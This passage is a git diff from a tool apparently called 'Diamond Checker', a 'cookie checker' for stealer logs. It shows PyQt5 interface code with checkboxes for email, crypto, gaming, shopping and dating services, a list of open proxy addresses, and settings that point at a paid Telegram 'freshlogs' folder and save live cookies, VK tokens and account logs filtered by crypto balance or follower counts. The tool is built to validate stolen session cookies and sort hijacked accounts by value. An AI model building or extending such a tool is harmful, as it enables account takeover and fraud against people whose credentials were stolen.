self.checkBox_coinbase.setObjectName("checkBox_coinbase") + self.gridLayout_6.addWidget(self.checkBox_coinbase, 0, 0, 1, 1) + self.checkBox_kryptex = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_kryptex.setFont(font) + self.checkBox_kryptex.setStyleSheet("") + self.checkBox_kryptex.setObjectName("checkBox_kryptex") + self.gridLayout_6.addWidget(self.checkBox_kryptex, 0, 1, 1, 1) + self.checkBox_hitbtc = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_hitbtc.setFont(font) + self.checkBox_hitbtc.setStyleSheet("") + self.checkBox_hitbtc.setObjectName("checkBox_hitbtc") + self.gridLayout_6.addWidget(self.checkBox_hitbtc, 1, 0, 1, 1) + self.checkBox_freebitcoin = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_freebitcoin.setFont(font) + self.checkBox_freebitcoin.setStyleSheet("") + self.checkBox_freebitcoin.setObjectName("checkBox_freebitcoin") + self.gridLayout_6.addWidget(self.checkBox_freebitcoin, 2, 0, 1, 1) + self.inbox_tab_widget.addTab(self.crypto_wallets_tab, "") + self.shopping_tab = QtWidgets.QWidget() + self.shopping_tab.setObjectName("shopping_tab") + self.layoutWidget1 = QtWidgets.QWidget(self.shopping_tab) + self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 731, 211)) + self.layoutWidget1.setObjectName("layoutWidget1") + self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget1) + self.gridLayout_2.setContentsMargins(0, 0, 0, 0) + self.gridLayout_2.setObjectName("gridLayout_2") + self.checkBox_amazon = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_amazon.setFont(font) + self.checkBox_amazon.setStyleSheet("") + self.checkBox_amazon.setObjectName("checkBox_amazon") + self.gridLayout_2.addWidget(self.checkBox_amazon, 0, 0, 1, 1) + self.ebay_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.ebay_checkbox.setEnabled(False) + self.ebay_checkbox.setObjectName("ebay_checkbox") + self.gridLayout_2.addWidget(self.ebay_checkbox, 0, 1, 1, 1) + self.airbnb_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.airbnb_checkbox.setEnabled(False) + self.airbnb_checkbox.setObjectName("airbnb_checkbox") + self.gridLayout_2.addWidget(self.airbnb_checkbox, 0, 2, 1, 1) + self.envato_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.envato_checkbox.setEnabled(False) + self.envato_checkbox.setObjectName("envato_checkbox") + self.gridLayout_2.addWidget(self.envato_checkbox, 0, 3, 1, 1) + self.flipkart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.flipkart_checkbox.setEnabled(False) + self.flipkart_checkbox.setObjectName("flipkart_checkbox") + self.gridLayout_2.addWidget(self.flipkart_checkbox, 0, 4, 1, 1) + self.checkBox_funpay = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_funpay.setFont(font) + self.checkBox_funpay.setStyleSheet("") + self.checkBox_funpay.setObjectName("checkBox_funpay") + self.gridLayout_2.addWidget(self.checkBox_funpay, 1, 0, 1, 1) + self.kleinanzeigen_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.kleinanzeigen_checkbox.setEnabled(False) + self.kleinanzeigen_checkbox.setObjectName("kleinanzeigen_checkbox") + self.gridLayout_2.addWidget(self.kleinanzeigen_checkbox, 1, 1, 1, 1) + self.booking_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.booking_checkbox.setEnabled(False) + self.booking_checkbox.setObjectName("booking_checkbox") + self.gridLayout_2.addWidget(self.booking_checkbox, 1, 2, 1, 1) + self.uber_eats_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.uber_eats_checkbox.setEnabled(False) + self.uber_eats_checkbox.setObjectName("uber_eats_checkbox") + self.gridLayout_2.addWidget(self.uber_eats_checkbox, 1, 3, 1, 1) + self.dh_gate_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.dh_gate_checkbox.setEnabled(False) + self.dh_gate_checkbox.setObjectName("dh_gate_checkbox") + self.gridLayout_2.addWidget(self.dh_gate_checkbox, 1, 4, 1, 1) + self.checkBox_humble = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_humble.setFont(font) + self.checkBox_humble.setStyleSheet("") + self.checkBox_humble.setObjectName("checkBox_humble") + self.gridLayout_2.addWidget(self.checkBox_humble, 2, 0, 1, 1) + self.temu_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.temu_checkbox.setEnabled(False) + self.temu_checkbox.setObjectName("temu_checkbox") + self.gridLayout_2.addWidget(self.temu_checkbox, 2, 1, 1, 1) + self.fiverr_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.fiverr_checkbox.setEnabled(False) + self.fiverr_checkbox.setObjectName("fiverr_checkbox") + self.gridLayout_2.addWidget(self.fiverr_checkbox, 2, 2, 1, 1) + self.zillow_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.zillow_checkbox.setEnabled(False) + self.zillow_checkbox.setObjectName("zillow_checkbox") + self.gridLayout_2.addWidget(self.zillow_checkbox, 2, 3, 1, 1) + self.instacart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.instacart_checkbox.setEnabled(False) + self.instacart_checkbox.setObjectName("instacart_checkbox") + self.gridLayout_2.addWidget(self.instacart_checkbox, 2, 4, 1, 1) + self.google_play_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.google_play_checkbox.setObjectName("google_play_checkbox") + self.gridLayout_2.addWidget(self.google_play_checkbox, 3, 0, 1, 1) + self.vinted_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.vinted_checkbox.setEnabled(False) + self.vinted_checkbox.setObjectName("vinted_checkbox") + self.gridLayout_2.addWidget(self.vinted_checkbox, 3, 1, 1, 1) + self.walmart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.walmart_checkbox.setEnabled(False) + self.walmart_checkbox.setObjectName("walmart_checkbox") + self.gridLayout_2.addWidget(self.walmart_checkbox, 3, 2, 1, 1) + self.inbox_tab_widget.addTab(self.shopping_tab, "") + self.daiting_tab = QtWidgets.QWidget() + self.daiting_tab.setObjectName("daiting_tab") + self.widget4 = QtWidgets.QWidget(self.daiting_tab) + self.widget4.setGeometry(QtCore.QRect(20, 0, 751, 221)) + self.widget4.setObjectName("widget4") + self.gridLayout_5 = QtWidgets.QGridLayout(self.widget4) + self.gridLayout_5.setContentsMargins(0, 0, 0, 0) + self.gridLayout_5.setObjectName("gridLayout_5") + self.ashley_madison_checkbox = QtWidgets.QCheckBox(self.widget4) + self.ashley_madison_checkbox.setEnabled(False) + self.ashley_madison_checkbox.setObjectName("ashley_madison_checkbox") + self.gridLayout_5.addWidget(self.ashley_madison_checkbox, 0, 0, 1, 1) + self.zoosk_checkbox = QtWidgets.QCheckBox(self.widget4) + self.zoosk_checkbox.setEnabled(False) + self.zoosk_checkbox.setObjectName("zoosk_checkbox") + self.gridLayout_5.addWidget(self.zoosk_checkbox, 0, 1, 1, 1) + self.meetme_checkbox = QtWidgets.QCheckBox(self.widget4) + self.meetme_checkbox.setEnabled(False) + self.meetme_checkbox.setObjectName("meetme_checkbox") + self.gridLayout_5.addWidget(self.meetme_checkbox, 0, 2, 1, 1) + self.eharmony_checkbox = QtWidgets.QCheckBox(self.widget4) + self.eharmony_checkbox.setEnabled(False) + self.eharmony_checkbox.setObjectName("eharmony_checkbox") + self.gridLayout_5.addWidget(self.eharmony_checkbox, 1, 0, 1, 1) + self.tinder_checkbox = QtWidgets.QCheckBox(self.widget4) + self.tinder_checkbox.setEnabled(False) + self.tinder_checkbox.setObjectName("tinder_checkbox") + self.gridLayout_5.addWidget(self.tinder_checkbox, 1, 1, 1, 1) + self.christan_mingle_checkbox = QtWidgets.QCheckBox(self.widget4) + self.christan_mingle_checkbox.setEnabled(False) + self.christan_mingle_checkbox.setObjectName("christan_mingle_checkbox") + self.gridLayout_5.addWidget(self.christan_mingle_checkbox, 1, 2, 1, 1) + self.inbox_tab_widget.addTab(self.daiting_tab, "") + self.number_of_label = QtWidgets.QLabel(self.centralwidget) + self.number_of_label.setGeometry(QtCore.QRect(540, 280, 71, 31)) + self.number_of_label.setObjectName("number_of_label") + self.files_label = QtWidgets.QLabel(self.centralwidget) + self.files_label.setGeometry(QtCore.QRect(540, 310, 71, 31)) + self.files_label.setObjectName("files_label") + self.folders_label = QtWidgets.QLabel(self.centralwidget) + self.folders_label.setGeometry(QtCore.QRect(540, 340, 71, 31)) + self.folders_label.setObjectName("folders_label") + self.cookies_label = QtWidgets.QLabel(self.centralwidget) + self.cookies_label.setGeometry(QtCore.QRect(540, 380, 71, 21)) + self.cookies_label.setObjectName("cookies_label") + self.cookie_stats_label = QtWidgets.QLabel(self.centralwidget) + self.cookie_stats_label.setGeometry(QtCore.QRect(700, 290, 81, 21)) + self.cookie_stats_label.setObjectName("cookie_stats_label") + self.live_label = QtWidgets.QLabel(self.centralwidget) + self.live_label.setGeometry(QtCore.QRect(700, 320, 71, 21)) + self.live_label.setObjectName("live_label") + self.dead_label = QtWidgets.QLabel(self.centralwidget) + self.dead_label.setGeometry(QtCore.QRect(700, 350, 71, 21)) + self.dead_label.setObjectName("dead_label") + self.errors_label = QtWidgets.QLabel(self.centralwidget) + self.errors_label.setGeometry(QtCore.QRect(700, 380, 71, 21)) + self.errors_label.setObjectName("errors_label") + self.stats_box.raise_() + self.lineEdit_dir.raise_() + self.lineEdit_proxy.raise_() + self.lineEdit_ua.raise_() + self.checkBox_ua.raise_() + self.label_2.raise_() + self.pushButton.raise_() + self.progressBar.raise_() + self.pushButton_dir_logs.raise_() + self.pushButton_proxies_files.raise_() + self.pushButton_useragents_file.raise_() + self.textEdit_console.raise_() + self.social_network_label.raise_() + self.spinBox_thr.raise_() + self.label_lgbt.raise_() + self.comboBox_proxy.raise_() + self.inbox_tab_widget.raise_() + self.number_of_label.raise_() + self.files_label.raise_() + self.folders_label.raise_() + self.cookies_label.raise_() + self.cookie_stats_label.raise_() + self.live_label.raise_() + self.dead_label.raise_() + self.errors_label.raise_() + MainWindow.setCentralWidget(self.centralwidget) + self.statusbar = QtWidgets.QStatusBar(MainWindow) + self.statusbar.setObjectName("statusbar") + MainWindow.setStatusBar(self.statusbar) + + self.retranslateUi(MainWindow) + self.inbox_tab_widget.setCurrentIndex(0) + self.pushButton_proxies_files.clicked.connect(MainWindow.proxies_file) # type: ignore + self.pushButton_dir_logs.clicked.connect(MainWindow.dir_logs) # type: ignore + self.pushButton_useragents_file.clicked.connect(MainWindow.useragents_file) # type: ignore + QtCore.QMetaObject.connectSlotsByName(MainWindow) + + def retranslateUi(self, MainWindow): + _translate = QtCore.QCoreApplication.translate + MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) + self.lineEdit_dir.setText(_translate("MainWindow", "The path to the logs")) + self.lineEdit_proxy.setText(_translate("MainWindow", "The path to the proxy")) + self.lineEdit_ua.setText(_translate("MainWindow", "The path to user agents")) + self.checkBox_ua.setText(_translate("MainWindow", "Enable")) + self.pushButton.setText(_translate("MainWindow", "Start")) + self.pushButton_dir_logs.setText(_translate("MainWindow", "Choose a path")) + self.pushButton_proxies_files.setText(_translate("MainWindow", "Choose a path")) + self.pushButton_useragents_file.setText(_translate("MainWindow", "Choose a path")) + self.textEdit_console.setHtml(_translate("MainWindow", "\n" +"\n" +"


")) + self.textEdit_console.setPlaceholderText(_translate("MainWindow", "Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project")) + self.social_network_label.setText(_translate("MainWindow", "Threads")) + self.comboBox_proxy.setItemText(0, _translate("MainWindow", "off")) + self.comboBox_proxy.setItemText(1, _translate("MainWindow", "socks4")) + self.comboBox_proxy.setItemText(2, _translate("MainWindow", "socks5")) + self.comboBox_proxy.setItemText(3, _translate("MainWindow", "http")) + self.gmail_inbox_checkbox.setText(_translate("MainWindow", "Gmail")) + self.yandex_checkbox.setText(_translate("MainWindow", "Yandex")) + self.yahoo_checkbox.setText(_translate("MainWindow", "Yahoo")) + self.outlook_checkbox.setText(_translate("MainWindow", "Outlook")) + self.webmail_checkbox.setText(_translate("MainWindow", "Webmail")) + self.mailru_checkbox.setText(_translate("MainWindow", "Mail.Ru")) + self.cpanel_checkbox.setText(_translate("MainWindow", "Cpanel")) + self.office_checkbox.setText(_translate("MainWindow", "Office")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.inbox_tab), _translate("MainWindow", "Inbox")) + self.bing_ads_checkbox.setText(_translate("MainWindow", "Bing Ads")) + self.reddit_ads__checkbox.setText(_translate("MainWindow", "Reddit Ads")) + self.ahref_checkbox.setText(_translate("MainWindow", "AHref SEO")) + self.snapchat_ads_checkbox.setText(_translate("MainWindow", "Snapchat Ads")) + self.tinder_ads_checkbox.setText(_translate("MainWindow", "Tinder Ads")) + self.twitter_ads_checkbox.setText(_translate("MainWindow", "Twitter Ads")) + self.sem_rush_checkbox.setText(_translate("MainWindow", "SEM Rush")) + self.craigslist_ads_checkbox.setText(_translate("MainWindow", "Craigslist Ads")) + self.facebookads__checkbox.setText(_translate("MainWindow", "Facebook Ads")) + self.microsoft_ads_checkbox.setText(_translate("MainWindow", "Microsoft Ads")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.ads_tab), _translate("MainWindow", "Ads")) + self.checkBox_steam.setText(_translate("MainWindow", "Steam")) + self.checkBox_pathofexile.setText(_translate("MainWindow", "PathofExile")) + self.checkBox_roblox.setText(_translate("MainWindow", "Roblox")) + self.checkBox_battlenet.setText(_translate("MainWindow", "BattleNet")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.game_tab), _translate("MainWindow", "Games")) + self.checkBox_instagram.setText(_translate("MainWindow", "Instagram")) + self.myspace_checkbox.setText(_translate("MainWindow", "Myspace")) + self.reddit_checkbox.setText(_translate("MainWindow", "Reddit")) + self.checkBox_discord.setText(_translate("MainWindow", "Discord")) + self.kick_checkbox.setText(_translate("MainWindow", "Kick")) + self.checkBox_facebook_ads.setText(_translate("MainWindow", "Facebook")) + self.checkBox_tiktok.setText(_translate("MainWindow", "TikTok")) + self.pintrest_checkbox.setText(_translate("MainWindow", "Pintrest")) + self.checkBox_youtube.setText(_translate("MainWindow", "YouTube")) + self.vimeo_checkbox.setText(_translate("MainWindow", "Vimeo")) + self.rumble_checkbox.setText(_translate("MainWindow", "Rumble")) + self.localsapp_checkbox.setText(_translate("MainWindow", "Locals")) + self.snapchat_checkbox.setText(_translate("MainWindow", "Snapchat")) + self.patreon_checkbox.setText(_translate("MainWindow", "Patreon")) + self.checkBox_netflix.setText(_translate("MainWindow", "Netflix")) + self.checkBox_vk.setText(_translate("MainWindow", "VK")) + self.twitch_checkbox.setText(_translate("MainWindow", "Twitch")) + self.linkedin_checkbox.setText(_translate("MainWindow", "LinkedIn")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.social_network_tab), _translate("MainWindow", "Social network")) + self.checkBox_coinbase.setText(_translate("MainWindow", "CoinBase")) + self.checkBox_kryptex.setText(_translate("MainWindow", "Kryptex")) + self.checkBox_hitbtc.setText(_translate("MainWindow", "HitBTC")) + self.checkBox_freebitcoin.setText(_translate("MainWindow", "FreeBitcoin")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.crypto_wallets_tab), _translate("MainWindow", "Crypto wallet")) + self.checkBox_amazon.setText(_translate("MainWindow", "Amazon")) + self.ebay_checkbox.setText(_translate("MainWindow", "Ebay")) + self.airbnb_checkbox.setText(_translate("MainWindow", "AirBNB")) + self.envato_checkbox.setText(_translate("MainWindow", "Envato Elements")) + self.flipkart_checkbox.setText(_translate("MainWindow", "Flipkart")) + self.checkBox_funpay.setText(_translate("MainWindow", "FunPay")) + self.kleinanzeigen_checkbox.setText(_translate("MainWindow", "Kleinanzeigen")) + self.booking_checkbox.setText(_translate("MainWindow", "Booking.com")) + self.uber_eats_checkbox.setText(_translate("MainWindow", "Uber Eats")) + self.dh_gate_checkbox.setText(_translate("MainWindow", "DH Gate")) + self.checkBox_humble.setText(_translate("MainWindow", "Humble")) + self.temu_checkbox.setText(_translate("MainWindow", "Temu")) + self.fiverr_checkbox.setText(_translate("MainWindow", "Fiverr")) + self.zillow_checkbox.setText(_translate("MainWindow", "Zillow")) + self.instacart_checkbox.setText(_translate("MainWindow", "Instacart")) + self.google_play_checkbox.setText(_translate("MainWindow", "Google Play")) + self.vinted_checkbox.setText(_translate("MainWindow", "Vinted")) + self.walmart_checkbox.setText(_translate("MainWindow", "Walmart")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.shopping_tab), _translate("MainWindow", "Shop")) + self.ashley_madison_checkbox.setText(_translate("MainWindow", "AshleyMaddison")) + self.zoosk_checkbox.setText(_translate("MainWindow", "Zoosk")) + self.meetme_checkbox.setText(_translate("MainWindow", "MeetMe")) + self.eharmony_checkbox.setText(_translate("MainWindow", "EHarmony")) + self.tinder_checkbox.setText(_translate("MainWindow", "Tinder")) + self.christan_mingle_checkbox.setText(_translate("MainWindow", "ChristanMingle")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.daiting_tab), _translate("MainWindow", "Daiting")) + self.number_of_label.setText(_translate("MainWindow", "Number of:")) + self.files_label.setText(_translate("MainWindow", "Files:")) + self.folders_label.setText(_translate("MainWindow", "Folders:")) + self.cookies_label.setText(_translate("MainWindow", "Cookies:")) + self.cookie_stats_label.setText(_translate("MainWindow", "Cookie Stats:")) + self.live_label.setText(_translate("MainWindow", "Live:")) + self.dead_label.setText(_translate("MainWindow", "Dead:")) + self.errors_label.setText(_translate("MainWindow", "Errors:")) + + +if __name__ == "__main__": + import sys + app = QtWidgets.QApplication(sys.argv) + MainWindow = QtWidgets.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) diff --git a/DiamondChecker/proxies.txt b/DiamondChecker/proxies.txt index 5314ae7..e1cfafd 100644 --- a/DiamondChecker/proxies.txt +++ b/DiamondChecker/proxies.txt @@ -1,25 +1,25 @@ -103.241.248.233:8000 -190.205.42.42:999 -103.152.100.187:8080 -202.29.243.36:8081 -190.71.27.179:999 -49.233.173.151:9080 -85.25.132.27:5566 -200.24.157.119:999 -137.59.162.226:443 -191.97.8.254:999 -41.184.178.247:8080 -159.192.253.35:8080 -202.162.198.188:3333 -186.3.7.209:999 -27.76.101.181:4001 -85.158.75.102:53281 -1.117.231.98:8080 -47.243.135.104:8080 -95.216.247.71:40042 -191.103.219.225:48612 -212.100.84.10:8080 -45.178.133.19:999 -202.150.150.211:8080 -138.0.188.134:10001 -177.136.32.214:45005 +103.241.248.233:8000 +190.205.42.42:999 +103.152.100.187:8080 +202.29.243.36:8081 +190.71.27.179:999 +49.233.173.151:9080 +85.25.132.27:5566 +200.24.157.119:999 +137.59.162.226:443 +191.97.8.254:999 +41.184.178.247:8080 +159.192.253.35:8080 +202.162.198.188:3333 +186.3.7.209:999 +27.76.101.181:4001 +85.158.75.102:53281 +1.117.231.98:8080 +47.243.135.104:8080 +95.216.247.71:40042 +191.103.219.225:48612 +212.100.84.10:8080 +45.178.133.19:999 +202.150.150.211:8080 +138.0.188.134:10001 +177.136.32.214:45005 diff --git a/DiamondChecker/settings.json b/DiamondChecker/settings.json index b2c9bae..49fe2cd 100644 --- a/DiamondChecker/settings.json +++ b/DiamondChecker/settings.json @@ -1,121 +1,121 @@ -{ - "services": { - "STEAM": 2, - "INSTAGRAM": 0, - "FACEBOOK": 0, - "FUNPAY": 0, - "BATTLE": 2, - "ROBLOX": 2, - "NETFLIX": 0, - "FREEBITCOIN": 0, - "HUMBLE": 0, - "COINBASE": 0, - "AMAZON": 0, - "KRYPTEX": 0, - "EPICGAMES": 0, - "TIKTOK": 2, - "PATHOFEXILE": 2, - "HITBTC": 0, - "MAIL_RU": 0, - "VK": 0, - "YT": 0, - "TWITCH": 2, - "DISCORD": 0, - "GENSHIN": 2, - "SNAPCHATADS": 2, - "MICROSOFTADS": 2, - "TINDERADS": 2, - "TWITTERADS": 2, - "CRAIGSLISTADS": 2, - "AIRBNB": 2, - "MICROSOFTADS_2": 2, - "WALMART": 2, - "AVTO": 2, - "UBEREATS": 2, - "ZILLOW": 2, - "FLIPKART": 2, - "DHGATE": 2, - "INSTACART": 2, - "ASHLEYMADISON": 2, - "ZOOSK": 2, - "CHRISTANMINGLE": 2, - "VINTED": 2, - "BOOKING": 2, - "TEMU": 2, - "KICK": 2, - "MYSPACE": 2, - "SNAPCHAT": 2, - "LOCALS": 2, - "ENVATO": 2, - "LINKEDIN": 2 - }, - "settings": { - "THR": 16, - "PROXY": "off", - "USERAGENT": 0, - "dir_logs": "E:/Telegram Downloads/DECEMBER 29 @freshlogs1only paid (2)/DECEMBER 29 @freshlogs1only paid", - "useragents_file": "C:/Users/Dooms/PycharmProjects/LogChecker/useragents.txt", - "proxies_file": "C:/Users/Dooms/PycharmProjects/LogChecker/proxies.txt", - "save_steam_logs": 1, - "save_yt_cookies": 1, - "save_yt_logs": 1, - "save_vk_logs": 1, - "save_twitch_logs": 1, - "save_instagram_logs": 1, - "save_facebook_logs": 1, - "save_funpay_logs": 1, - "save_battlenet_logs": 1, - "save_roblox_logs": 1, - "save_netflix_logs": 1, - "save_freebtc_logs": 1, - "save_humble_logs": 1, - "save_coinbase_logs": 1, - "save_epic_logs": 1, - "save_amazon_logs": 1, - "save_pathofexile_logs": 1, - "save_hitbtc_logs": 1, - "save_bitpick_logs": 1, - "save_airbnb_logs": 1, - "save_walmart_logs": 1, - "save_ubereats_logs": 1, - "save_instacart_logs": 1, - "save_zoosk_logs": 1, - "save_tinderads_logs": 1, - "save_ashleymadison_logs": 1, - "save_kick_logs": 1, - "save_microsoftads_logs": 1, - "save_dhgate_logs": 1, - "save_fiverr_logs": 1, - "save_envato_logs": 1, - "save_locals_logs": 1, - "save_vinted_logs": 1, - "save_snapchatads_logs": 1, - "save_twitterads_logs": 1, - "save_christianmingle_logs": 1, - "save_booking_logs": 1, - "save_tiktok_logs": 1 - }, - "cookies": { - "twitch": 1, - "vk": 1, - "funpay": 1, - "instagram": 1 - }, - "filters": { - "youtube_min_subs": 0, - "youtube_max_subs": 999999999 - }, - "other": { - "save_vk_tokens": 1, - "mailru_query": "" - }, - "save_filters": { - "yt_min_subs": 1, - "freebtc_min_balance": 1e-05, - "inst_min_subs": 1, - "tiktok_min_subs": 1 - }, - "authorization": { - "username": "" - } +{ + "services": { + "STEAM": 0, + "INSTAGRAM": 0, + "FACEBOOK": 0, + "FUNPAY": 0, + "BATTLE": 0, + "ROBLOX": 0, + "NETFLIX": 0, + "FREEBITCOIN": 0, + "HUMBLE": 0, + "COINBASE": 0, + "AMAZON": 0, + "KRYPTEX": 0, + "EPICGAMES": 0, + "TIKTOK": 0, + "PATHOFEXILE": 0, + "HITBTC": 0, + "MAIL_RU": 0, + "VK": 0, + "YT": 0, + "TWITCH": 2, + "DISCORD": 0, + "GENSHIN": 2, + "SNAPCHATADS": 2, + "MICROSOFTADS": 2, + "TINDERADS": 2, + "TWITTERADS": 2, + "CRAIGSLISTADS": 2, + "AIRBNB": 2, + "MICROSOFTADS_2": 2, + "WALMART": 2, + "AVTO": 2, + "UBEREATS": 2, + "ZILLOW": 2, + "FLIPKART": 2, + "DHGATE": 2, + "INSTACART": 2, + "ASHLEYMADISON": 2, + "ZOOSK": 2, + "CHRISTANMINGLE": 2, + "VINTED": 2, + "BOOKING": 2, + "TEMU": 2, + "KICK": 0, + "MYSPACE": 2, + "SNAPCHAT": 2, + "LOCALS": 2, + "ENVATO": 2, + "LINKEDIN": 2 + }, + "settings": { + "THR": 16, + "PROXY": "off", + "USERAGENT": 0, + "dir_logs": "C:/Users/Dooms/Desktop/@FreeOLDCloud", + "useragents_file": "C:/Users/Dooms/PycharmProjects/LogChecker/useragents.txt", + "proxies_file": "C:/Users/Dooms/PycharmProjects/LogChecker/proxies.txt", + "save_steam_logs": 1, + "save_yt_cookies": 1, + "save_yt_logs": 1, + "save_vk_logs": 1, + "save_twitch_logs": 1, + "save_instagram_logs": 1, + "save_facebook_logs": 1, + "save_funpay_logs": 1, + "save_battlenet_logs": 1, + "save_roblox_logs": 1, + "save_netflix_logs": 1, + "save_freebtc_logs": 1, + "save_humble_logs": 1, + "save_coinbase_logs": 1, + "save_epic_logs": 1, + "save_amazon_logs": 1, + "save_pathofexile_logs": 1, + "save_hitbtc_logs": 1, + "save_bitpick_logs": 1, + "save_airbnb_logs": 1, + "save_walmart_logs": 1, + "save_ubereats_logs": 1, + "save_instacart_logs": 1, + "save_zoosk_logs": 1, + "save_tinderads_logs": 1, + "save_ashleymadison_logs": 1, + "save_kick_logs": 1, + "save_microsoftads_logs": 1, + "save_dhgate_logs": 1, + "save_fiverr_logs": 1, + "save_envato_logs": 1, + "save_locals_logs": 1, + "save_vinted_logs": 1, + "save_snapchatads_logs": 1, + "save_twitterads_logs": 1, + "save_christianmingle_logs": 1, + "save_booking_logs": 1, + "save_tiktok_logs": 1 + }, + "cookies": { + "twitch": 1, + "vk": 1, + "funpay": 1, + "instagram": 1 + }, + "filters": { + "youtube_min_subs": 0, + "youtube_max_subs": 999999999 + }, + "other": { + "save_vk_tokens": 1, + "mailru_query": "" + }, + "save_filters": { + "yt_min_subs": 1, + "freebtc_min_balance": 1e-05, + "inst_min_subs": 1, + "tiktok_min_subs": 1 + }, + "authorization": { + "username": "" + } } \ No newline at end of file diff --git a/DiamondChecker/ui_main.py b/DiamondChecker/ui_main.py index 982c091..3435497 100644 --- a/DiamondChecker/ui_main.py +++ b/DiamondChecker/ui_main.py @@ -1,1092 +1,1092 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'main_ui.ui' -# -# Created by: PyQt5 UI code generator 5.15.9 -# -# WARNING: Any manual changes made to this file will be lost when pyuic5 is -# run again. Do not edit this file unless you know what you are doing. - - -from PyQt5 import QtCore, QtGui, QtWidgets - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName("MainWindow") - MainWindow.resize(801, 820) - MainWindow.setMinimumSize(QtCore.QSize(801, 677)) - MainWindow.setMaximumSize(QtCore.QSize(801, 999)) - MainWindow.setSizeIncrement(QtCore.QSize(801, 677)) - MainWindow.setBaseSize(QtCore.QSize(801, 677)) - MainWindow.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName("centralwidget") - self.lineEdit_dir = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_dir.setGeometry(QtCore.QRect(10, 280, 421, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_dir.setFont(font) - self.lineEdit_dir.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_dir.setObjectName("lineEdit_dir") - self.lineEdit_proxy = QtWidgets.QLineEdit(self.centralwidget) - 